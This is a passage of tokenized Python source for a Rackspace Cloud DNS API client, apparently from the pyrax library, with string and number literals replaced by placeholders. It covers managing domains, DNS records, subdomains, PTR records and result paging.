update_records ( self , records ) <EOL> def delete_record ( self , record ) : <EOL> """<STR_LIT>""" <EOL> return self . manager . delete_record ( self , record ) <EOL> class CloudDNSPTRRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , device = None ) : <EOL> self . type = self . id = self . data = self . name = None <EOL> self . ttl = self . comment = None <EOL> if data : <EOL> for key , val in data . items ( ) : <EOL> setattr ( self , key , val ) <EOL> self . device = device <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return pyrax . cloud_dns . delete_ptr_records ( self . device , self . data ) <EOL> def __repr__ ( self ) : <EOL> reprkeys = ( "<STR_LIT:id>" , "<STR_LIT:data>" , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> info = "<STR_LIT:U+002CU+0020>" . join ( "<STR_LIT>" % ( key , getattr ( self , key ) ) for key in reprkeys ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , info ) <EOL> class CloudDNSManager ( BaseManager ) : <EOL> def __init__ ( self , api , resource_class = None , response_key = None , <EOL> plural_response_key = None , uri_base = None ) : <EOL> super ( CloudDNSManager , self ) . __init__ ( api , resource_class = resource_class , <EOL> response_key = response_key , plural_response_key = plural_response_key , <EOL> uri_base = uri_base ) <EOL> self . _paging = { "<STR_LIT>" : { } , "<STR_LIT>" : { } , "<STR_LIT>" : { } } <EOL> self . _reset_paging ( service = "<STR_LIT:all>" ) <EOL> self . _timeout = DEFAULT_TIMEOUT <EOL> self . 
_delay = DEFAULT_DELAY <EOL> def _create_body ( self , name , emailAddress , ttl = <NUM_LIT> , comment = None , <EOL> subdomains = None , records = None ) : <EOL> """<STR_LIT>""" <EOL> if subdomains is None : <EOL> subdomains = [ ] <EOL> if records is None : <EOL> records = [ ] <EOL> body = { "<STR_LIT>" : [ { <EOL> "<STR_LIT:name>" : name , <EOL> "<STR_LIT>" : emailAddress , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : comment , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : subdomains <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : records <EOL> } , <EOL> } ] } <EOL> return body <EOL> def _set_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . _timeout = timeout <EOL> def _set_delay ( self , delay ) : <EOL> """<STR_LIT>""" <EOL> self . _delay = delay <EOL> def _reset_paging ( self , service , body = None ) : <EOL> """<STR_LIT>""" <EOL> if service == "<STR_LIT:all>" : <EOL> for svc in self . _paging . keys ( ) : <EOL> svc_dct = self . _paging [ svc ] <EOL> svc_dct [ "<STR_LIT>" ] = svc_dct [ "<STR_LIT>" ] = None <EOL> svc_dct [ "<STR_LIT>" ] = None <EOL> return <EOL> svc_dct = self . _paging [ service ] <EOL> svc_dct [ "<STR_LIT>" ] = svc_dct [ "<STR_LIT>" ] = None <EOL> svc_dct [ "<STR_LIT>" ] = None <EOL> if not body : <EOL> return <EOL> svc_dct [ "<STR_LIT>" ] = body . get ( "<STR_LIT>" ) <EOL> links = body . get ( "<STR_LIT>" ) <EOL> uri_base = self . uri_base <EOL> if links : <EOL> for link in links : <EOL> href = link [ "<STR_LIT>" ] <EOL> pos = href . index ( uri_base ) <EOL> page_uri = href [ pos - <NUM_LIT:1> : ] <EOL> if link [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> svc_dct [ "<STR_LIT>" ] = page_uri <EOL> elif link [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> svc_dct [ "<STR_LIT>" ] = page_uri <EOL> def _get_pagination_qs ( self , limit , offset ) : <EOL> pagination_items = [ ] <EOL> if limit is not None : <EOL> pagination_items . append ( "<STR_LIT>" % limit ) <EOL> if offset is not None : <EOL> pagination_items . 
append ( "<STR_LIT>" % offset ) <EOL> qs = "<STR_LIT:&>" . join ( pagination_items ) <EOL> qs = "<STR_LIT>" % qs if qs else "<STR_LIT>" <EOL> return qs <EOL> def list ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( self . uri_base , self . _get_pagination_qs ( limit , offset ) ) <EOL> return self . _list ( uri ) <EOL> def _list ( self , uri , obj_class = None , list_all = False ) : <EOL> """<STR_LIT>""" <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> if obj_class is None : <EOL> obj_class = self . resource_class <EOL> data = resp_body [ self . plural_response_key ] <EOL> ret = [ obj_class ( self , res , loaded = False ) <EOL> for res in data if res ] <EOL> self . _reset_paging ( "<STR_LIT>" , resp_body ) <EOL> if list_all : <EOL> dom_paging = self . _paging . get ( "<STR_LIT>" , { } ) <EOL> while dom_paging . get ( "<STR_LIT>" ) : <EOL> next_uri = dom_paging . get ( "<STR_LIT>" ) <EOL> ret . extend ( self . _list ( uri = next_uri , obj_class = obj_class , <EOL> list_all = False ) ) <EOL> return ret <EOL> def list_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list ( uri ) <EOL> def list_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list ( uri ) <EOL> def _get ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % uri <EOL> resp , body = self . _retry_get ( uri ) <EOL> body [ "<STR_LIT>" ] = [ ] <EOL> return self . resource_class ( self , body , loaded = True ) <EOL> def _retry_get ( self , uri ) : <EOL> """<STR_LIT>""" <EOL> for i in six . moves . range ( DEFAULT_RETRY ) : <EOL> resp , body = self . api . 
method_get ( uri ) <EOL> if body : <EOL> return resp , body <EOL> raise exc . ServiceResponseFailure ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def _async_call ( self , uri , body = None , method = "<STR_LIT:GET>" , error_class = None , <EOL> has_response = True , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> api_methods = { <EOL> "<STR_LIT:GET>" : self . _retry_get , <EOL> "<STR_LIT:POST>" : self . api . method_post , <EOL> "<STR_LIT>" : self . api . method_put , <EOL> "<STR_LIT>" : self . api . method_delete , <EOL> } <EOL> api_method = api_methods [ method ] <EOL> try : <EOL> if body is None : <EOL> resp , resp_body = api_method ( uri , * args , ** kwargs ) <EOL> else : <EOL> resp , resp_body = api_method ( uri , body = body , * args , ** kwargs ) <EOL> except Exception as e : <EOL> if error_class : <EOL> raise error_class ( e ) <EOL> else : <EOL> raise <EOL> callbackURL = resp_body [ "<STR_LIT>" ] . split ( "<STR_LIT>" ) [ - <NUM_LIT:1> ] <EOL> massagedURL = "<STR_LIT>" % callbackURL <EOL> start = time . time ( ) <EOL> timed_out = False <EOL> while ( resp_body [ "<STR_LIT:status>" ] == "<STR_LIT>" ) and not timed_out : <EOL> resp_body = None <EOL> while resp_body is None and not timed_out : <EOL> resp , resp_body = self . _retry_get ( massagedURL ) <EOL> if self . _timeout : <EOL> timed_out = ( ( time . time ( ) - start ) > self . _timeout ) <EOL> time . sleep ( self . _delay ) <EOL> if timed_out : <EOL> raise exc . DNSCallTimedOut ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( uri , self . _timeout ) ) <EOL> if error_class and ( resp_body [ "<STR_LIT:status>" ] == "<STR_LIT>" ) : <EOL> self . _process_async_error ( resp_body , error_class ) <EOL> if has_response : <EOL> ret = resp , resp_body [ "<STR_LIT>" ] <EOL> else : <EOL> ret = resp , resp_body <EOL> try : <EOL> resp_body = json . 
loads ( resp_body ) <EOL> except Exception : <EOL> pass <EOL> return ret <EOL> def _process_async_error ( self , resp_body , error_class ) : <EOL> """<STR_LIT>""" <EOL> def _fmt_error ( err ) : <EOL> details = err . get ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT:\n>" , "<STR_LIT:U+0020>" ) <EOL> if not details : <EOL> details = err . get ( "<STR_LIT:message>" , "<STR_LIT>" ) <EOL> return "<STR_LIT>" % ( details , err . get ( "<STR_LIT:code>" , "<STR_LIT>" ) ) <EOL> error = resp_body . get ( "<STR_LIT:error>" , "<STR_LIT>" ) <EOL> if "<STR_LIT>" in error : <EOL> faults = error . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , [ ] ) <EOL> msgs = [ _fmt_error ( fault ) for fault in faults ] <EOL> msg = "<STR_LIT:\n>" . join ( msgs ) <EOL> else : <EOL> msg = _fmt_error ( error ) <EOL> raise error_class ( msg ) <EOL> def _create ( self , uri , body , records = None , subdomains = None , <EOL> return_none = False , return_raw = False , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . run_hooks ( "<STR_LIT>" , body , ** kwargs ) <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT:POST>" , <EOL> error_class = exc . DomainCreationFailed ) <EOL> response_body = resp_body [ self . response_key ] [ <NUM_LIT:0> ] <EOL> return self . resource_class ( self , response_body ) <EOL> def delete ( self , domain , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( self . uri_base , utils . get_id ( domain ) ) <EOL> if delete_subdomains : <EOL> uri = "<STR_LIT>" % uri <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> error_class = exc . DomainDeletionFailed , has_response = False ) <EOL> def findall ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if ( len ( kwargs ) == <NUM_LIT:1> ) and ( "<STR_LIT:name>" in kwargs ) : <EOL> nm = kwargs [ "<STR_LIT:name>" ] . lower ( ) <EOL> uri = "<STR_LIT>" % ( self . uri_base , nm ) <EOL> matches = self . 
_list ( uri , list_all = True ) <EOL> return [ match for match in matches <EOL> if match . name . lower ( ) == nm ] <EOL> else : <EOL> return super ( CloudDNSManager , self ) . findall ( ** kwargs ) <EOL> def changes_since ( self , domain , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> domain_id = utils . get_id ( domain ) <EOL> dt = utils . iso_time_string ( date_or_datetime , show_tzinfo = True ) <EOL> uri = "<STR_LIT>" % ( domain_id , dt ) <EOL> resp , body = self . _retry_get ( uri ) <EOL> return body . get ( "<STR_LIT>" , [ ] ) <EOL> def export_domain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:GET>" , <EOL> error_class = exc . NotFound ) <EOL> return resp_body . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def import_domain ( self , domain_data ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" <EOL> body = { "<STR_LIT>" : [ { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : domain_data , <EOL> } ] } <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:POST>" , body = body , <EOL> error_class = exc . DomainCreationFailed ) <EOL> return resp_body <EOL> def update_domain ( self , domain , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> if not any ( ( emailAddress , ttl , comment ) ) : <EOL> raise exc . MissingDNSSettings ( <EOL> "<STR_LIT>" ) <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> body = { "<STR_LIT>" : comment , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : emailAddress , <EOL> } <EOL> none_keys = [ key for key , val in body . items ( ) <EOL> if val is None ] <EOL> for none_key in none_keys : <EOL> body . pop ( none_key ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , body = body , <EOL> error_class = exc . 
DomainUpdateFailed , has_response = False ) <EOL> return resp_body <EOL> def list_subdomains ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % domain . name <EOL> page_qs = self . _get_pagination_qs ( limit , offset ) <EOL> if page_qs : <EOL> uri = "<STR_LIT>" % ( uri , page_qs [ <NUM_LIT:1> : ] ) <EOL> return self . _list_subdomains ( uri , domain . id ) <EOL> def _list_subdomains ( self , uri , domain_id ) : <EOL> resp , body = self . _retry_get ( uri ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> subdomains = body . get ( "<STR_LIT>" , [ ] ) <EOL> return [ CloudDNSDomain ( self , subdomain , loaded = False ) <EOL> for subdomain in subdomains <EOL> if subdomain [ "<STR_LIT:id>" ] != domain_id ] <EOL> def list_subdomains_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_subdomains ( uri ) <EOL> def list_subdomains_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_subdomains ( uri ) <EOL> def list_records ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( utils . get_id ( domain ) , <EOL> self . _get_pagination_qs ( limit , offset ) ) <EOL> return self . _list_records ( uri ) <EOL> def _list_records ( self , uri ) : <EOL> resp , body = self . _retry_get ( uri ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> pat = "<STR_LIT>" <EOL> mtch = re . search ( pat , uri ) <EOL> dom_id = mtch . groups ( ) [ <NUM_LIT:0> ] <EOL> records = body . 
get ( "<STR_LIT>" , [ ] ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def list_records_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return self . _list_records ( uri ) <EOL> def list_records_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> uri = self . _paging . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> if uri is None : <EOL> raise exc . NoMoreResults ( "<STR_LIT>" ) <EOL> return self . _list_records ( uri ) <EOL> def search_records ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> search_params = [ ] <EOL> if name : <EOL> search_params . append ( "<STR_LIT>" % name ) <EOL> if data : <EOL> search_params . append ( "<STR_LIT>" % data ) <EOL> query_string = "<STR_LIT:&>" . join ( search_params ) <EOL> dom_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % ( dom_id , record_type ) <EOL> if query_string : <EOL> uri = "<STR_LIT>" % ( uri , query_string ) <EOL> resp , body = self . _retry_get ( uri ) <EOL> records = body . get ( "<STR_LIT>" , [ ] ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> rec_paging = self . _paging . get ( "<STR_LIT>" , { } ) <EOL> while rec_paging . get ( "<STR_LIT>" ) : <EOL> resp , body = self . _retry_get ( rec_paging . get ( "<STR_LIT>" ) ) <EOL> self . _reset_paging ( "<STR_LIT>" , body ) <EOL> records . extend ( body . 
get ( "<STR_LIT>" , [ ] ) ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def add_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( records , dict ) : <EOL> records = [ records ] <EOL> dom_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % dom_id <EOL> body = { "<STR_LIT>" : records } <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT:POST>" , body = body , <EOL> error_class = exc . DomainRecordAdditionFailed , has_response = False ) <EOL> records = resp_body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" , [ ] ) <EOL> for record in records : <EOL> record [ "<STR_LIT>" ] = dom_id <EOL> return [ CloudDNSRecord ( self , record , loaded = False ) <EOL> for record in records if record ] <EOL> def get_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> rec_id = utils . get_id ( record ) <EOL> domain_id = utils . get_id ( domain ) <EOL> uri = "<STR_LIT>" % ( domain_id , rec_id ) <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> resp_body [ "<STR_LIT>" ] = domain_id <EOL> return CloudDNSRecord ( self , resp_body , loaded = False ) <EOL> def update_record ( self , domain , record , data = None , priority = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> rdict = { "<STR_LIT:id>" : record . id , <EOL> "<STR_LIT:name>" : record . name , <EOL> } <EOL> pdict = { "<STR_LIT:data>" : data , <EOL> "<STR_LIT>" : priority , <EOL> "<STR_LIT>" : ttl , <EOL> "<STR_LIT>" : comment , <EOL> } <EOL> utils . params_to_dict ( pdict , rdict ) <EOL> return self . update_records ( domain , [ rdict ] ) <EOL> def update_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( records , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> uri = "<STR_LIT>" % utils . get_id ( domain ) <EOL> resp , resp_body = self . 
_async_call ( uri , method = "<STR_LIT>" , <EOL> body = { "<STR_LIT>" : records } , <EOL> error_class = exc . DomainRecordUpdateFailed , has_response = False ) <EOL> return resp_body <EOL> def delete_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> uri = "<STR_LIT>" % ( utils . get_id ( domain ) , <EOL> utils . get_id ( record ) ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> error_class = exc . DomainRecordDeletionFailed , has_response = False ) <EOL> return resp_body <EOL> def _get_ptr_details ( self , device , device_type ) : <EOL> """<STR_LIT>""" <EOL> context = self . api . identity <EOL> region = self . api . region_name <EOL> if device_type . lower ( ) . startswith ( "<STR_LIT>" ) : <EOL> ep = pyrax . _get_service_endpoint ( context , "<STR_LIT>" , region ) <EOL> svc = "<STR_LIT>" <EOL> svc_name = "<STR_LIT>" <EOL> else : <EOL> ep = pyrax . _get_service_endpoint ( context , "<STR_LIT>" , region ) <EOL> svc = "<STR_LIT>" <EOL> svc_name = "<STR_LIT>" <EOL> href = "<STR_LIT>" % ( ep , svc , utils . get_id ( device ) ) <EOL> return ( href , svc_name ) <EOL> def _resolve_device_type ( self , device ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> from tests . unit import fakes <EOL> server_types = ( pyrax . CloudServer , fakes . FakeServer ) <EOL> lb_types = ( CloudLoadBalancer , fakes . FakeLoadBalancer , <EOL> fakes . FakeDNSDevice ) <EOL> except ImportError : <EOL> server_types = ( pyrax . CloudServer , ) <EOL> lb_types = ( CloudLoadBalancer , ) <EOL> if isinstance ( device , server_types ) : <EOL> device_type = "<STR_LIT>" <EOL> elif isinstance ( device , lb_types ) : <EOL> device_type = "<STR_LIT>" <EOL> else : <EOL> raise exc . InvalidDeviceType ( "<STR_LIT>" <EOL> "<STR_LIT>" % device ) <EOL> return device_type <EOL> def list_ptr_records ( self , device ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . 
_get_ptr_details ( device , device_type ) <EOL> uri = "<STR_LIT>" % ( svc_name , href ) <EOL> try : <EOL> resp , resp_body = self . _retry_get ( uri ) <EOL> except exc . NotFound : <EOL> return [ ] <EOL> records = [ CloudDNSPTRRecord ( rec , device ) <EOL> for rec in resp_body . get ( "<STR_LIT>" , [ ] ) ] <EOL> return records <EOL> def add_ptr_records ( self , device , records ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> if not isinstance ( records , ( list , tuple ) ) : <EOL> records = [ records ] <EOL> body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : records } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:content>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> "<STR_LIT>" : svc_name , <EOL> } } <EOL> uri = "<STR_LIT>" <EOL> try : <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT:POST>" , <EOL> error_class = exc . PTRRecordCreationFailed ) <EOL> except exc . EndpointNotFound : <EOL> raise exc . InvalidPTRRecord ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return resp_body . get ( "<STR_LIT>" ) <EOL> records = [ CloudDNSPTRRecord ( rec , device ) <EOL> for rec in resp_body . get ( "<STR_LIT>" , [ ] ) ] <EOL> return records <EOL> def update_ptr_record ( self , device , record , domain_name , data = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> try : <EOL> rec_id = record . 
id <EOL> except AttributeError : <EOL> rec_id = record <EOL> rec = { "<STR_LIT:name>" : domain_name , <EOL> "<STR_LIT:id>" : rec_id , <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:data>" : data , <EOL> } <EOL> if ttl is not None : <EOL> rec [ "<STR_LIT>" ] = max ( <NUM_LIT> , ttl ) <EOL> if comment is not None : <EOL> rec [ "<STR_LIT>" ] = comment [ : <NUM_LIT> ] <EOL> body = { "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ rec ] } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:content>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : href , <EOL> "<STR_LIT>" : svc_name , <EOL> } } <EOL> uri = "<STR_LIT>" <EOL> try : <EOL> resp , resp_body = self . _async_call ( uri , body = body , method = "<STR_LIT>" , <EOL> has_response = False , error_class = exc . PTRRecordUpdateFailed ) <EOL> except exc . EndpointNotFound as e : <EOL> raise exc . InvalidPTRRecord ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return resp_body . get ( "<STR_LIT:status>" ) == "<STR_LIT>" <EOL> def delete_ptr_records ( self , device , ip_address = None ) : <EOL> """<STR_LIT>""" <EOL> device_type = self . _resolve_device_type ( device ) <EOL> href , svc_name = self . _get_ptr_details ( device , device_type ) <EOL> uri = "<STR_LIT>" % ( svc_name , href ) <EOL> if ip_address : <EOL> uri = "<STR_LIT>" % ( uri , ip_address ) <EOL> resp , resp_body = self . _async_call ( uri , method = "<STR_LIT>" , <EOL> has_response = False , <EOL> error_class = exc . PTRRecordDeletionFailed ) <EOL> return resp_body . get ( "<STR_LIT:status>" ) == "<STR_LIT>" <EOL> class CloudDNSClient ( BaseClient ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> def _configure_manager ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _manager = CloudDNSManager ( self , resource_class = CloudDNSDomain , <EOL> response_key = "<STR_LIT>" , plural_response_key = "<STR_LIT>" , <EOL> uri_base = "<STR_LIT>" ) <EOL> def method_get ( self , uri , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for i in six . moves . 
range ( <NUM_LIT:3> ) : <EOL> resp , body = super ( CloudDNSClient , self ) . method_get ( uri , ** kwargs ) <EOL> if body : <EOL> return resp , body <EOL> raise exc . ServiceResponseFailure ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def set_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> self . _manager . _set_timeout ( timeout ) <EOL> def set_delay ( self , delay ) : <EOL> """<STR_LIT>""" <EOL> self . _manager . _set_delay ( delay ) <EOL> def list ( self , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list ( limit = limit , offset = offset ) <EOL> def list_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_previous_page ( ) <EOL> def list_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_next_page ( ) <EOL> def get_domain_iterator ( self ) : <EOL> """<STR_LIT>""" <EOL> return DomainResultsIterator ( self . _manager ) <EOL> @ assure_domain <EOL> def changes_since ( self , domain , date_or_datetime ) : <EOL> """<STR_LIT>""" <EOL> return domain . changes_since ( date_or_datetime ) <EOL> @ assure_domain <EOL> def export_domain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> return domain . export ( ) <EOL> def import_domain ( self , domain_data ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . import_domain ( domain_data ) <EOL> @ assure_domain <EOL> def update_domain ( self , domain , emailAddress = None , ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . update ( emailAddress = emailAddress , <EOL> ttl = ttl , comment = comment ) <EOL> @ assure_domain <EOL> def delete ( self , domain , delete_subdomains = False ) : <EOL> """<STR_LIT>""" <EOL> domain . delete ( delete_subdomains = delete_subdomains ) <EOL> @ assure_domain <EOL> def list_subdomains ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . 
list_subdomains ( limit = limit , offset = offset ) <EOL> def get_subdomain_iterator ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return SubdomainResultsIterator ( self . _manager , domain = domain ) <EOL> def list_subdomains_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_subdomains_previous_page ( ) <EOL> def list_subdomains_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_subdomains_next_page ( ) <EOL> @ assure_domain <EOL> def list_records ( self , domain , limit = None , offset = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . list_records ( limit = limit , offset = offset ) <EOL> def get_record_iterator ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> return RecordResultsIterator ( self . _manager , domain = domain ) <EOL> def list_records_previous_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_records_previous_page ( ) <EOL> def list_records_next_page ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_records_next_page ( ) <EOL> @ assure_domain <EOL> def search_records ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . search_records ( record_type = record_type , <EOL> name = name , data = data ) <EOL> @ assure_domain <EOL> def find_record ( self , domain , record_type , name = None , data = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . find_record ( record_type = record_type , <EOL> name = name , data = data ) <EOL> @ assure_domain <EOL> def add_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> return domain . add_records ( records ) <EOL> add_record = add_records <EOL> @ assure_domain <EOL> def get_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> return domain . 
get_record ( record ) <EOL> @ assure_domain <EOL> def update_record ( self , domain , record , data = None , priority = None , ttl = None , <EOL> comment = None ) : <EOL> """<STR_LIT>""" <EOL> return domain . update_record ( record , data = data , priority = priority , <EOL> ttl = ttl , comment = comment ) <EOL> @ assure_domain <EOL> def update_records ( self , domain , records ) : <EOL> """<STR_LIT>""" <EOL> return domain . update_records ( records ) <EOL> @ assure_domain <EOL> def delete_record ( self , domain , record ) : <EOL> """<STR_LIT>""" <EOL> return domain . delete_record ( record ) <EOL> def list_ptr_records ( self , device ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . list_ptr_records ( device ) <EOL> def add_ptr_records ( self , device , records ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . add_ptr_records ( device , records ) <EOL> def update_ptr_record ( self , device , record , domain_name , data = None , <EOL> ttl = None , comment = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . update_ptr_record ( device , record , domain_name , <EOL> data = data , ttl = ttl , comment = comment ) <EOL> def delete_ptr_records ( self , device , ip_address = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _manager . delete_ptr_records ( device , ip_address = ip_address ) <EOL> def get_absolute_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , body = self . method_get ( "<STR_LIT>" ) <EOL> absolute_limits = body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> return absolute_limits <EOL> def get_rate_limits ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , body = self . method_get ( "<STR_LIT>" ) <EOL> rate_limits = body . get ( "<STR_LIT>" , { } ) . get ( "<STR_LIT>" ) <EOL> ret = [ ] <EOL> for rate_limit in rate_limits : <EOL> limits = rate_limit [ "<STR_LIT>" ] <EOL> uri_limits = { "<STR_LIT>" : rate_limit [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : limits } <EOL> ret . 
append ( uri_limits ) <EOL> return ret <EOL> class ResultsIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , manager , domain = None ) : <EOL> self . manager = manager <EOL> self . domain = domain <EOL> self . domain_id = utils . get_id ( domain ) if domain else None <EOL> self . results = [ ] <EOL> self . next_uri = "<STR_LIT>" <EOL> self . extra_args = tuple ( ) <EOL> self . _init_methods ( ) <EOL> def _init_methods ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self . results . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> if self . next_uri is None : <EOL> raise StopIteration ( ) <EOL> else : <EOL> if not self . next_uri : <EOL> if self . domain : <EOL> self . results = self . list_method ( self . domain ) <EOL> else : <EOL> self 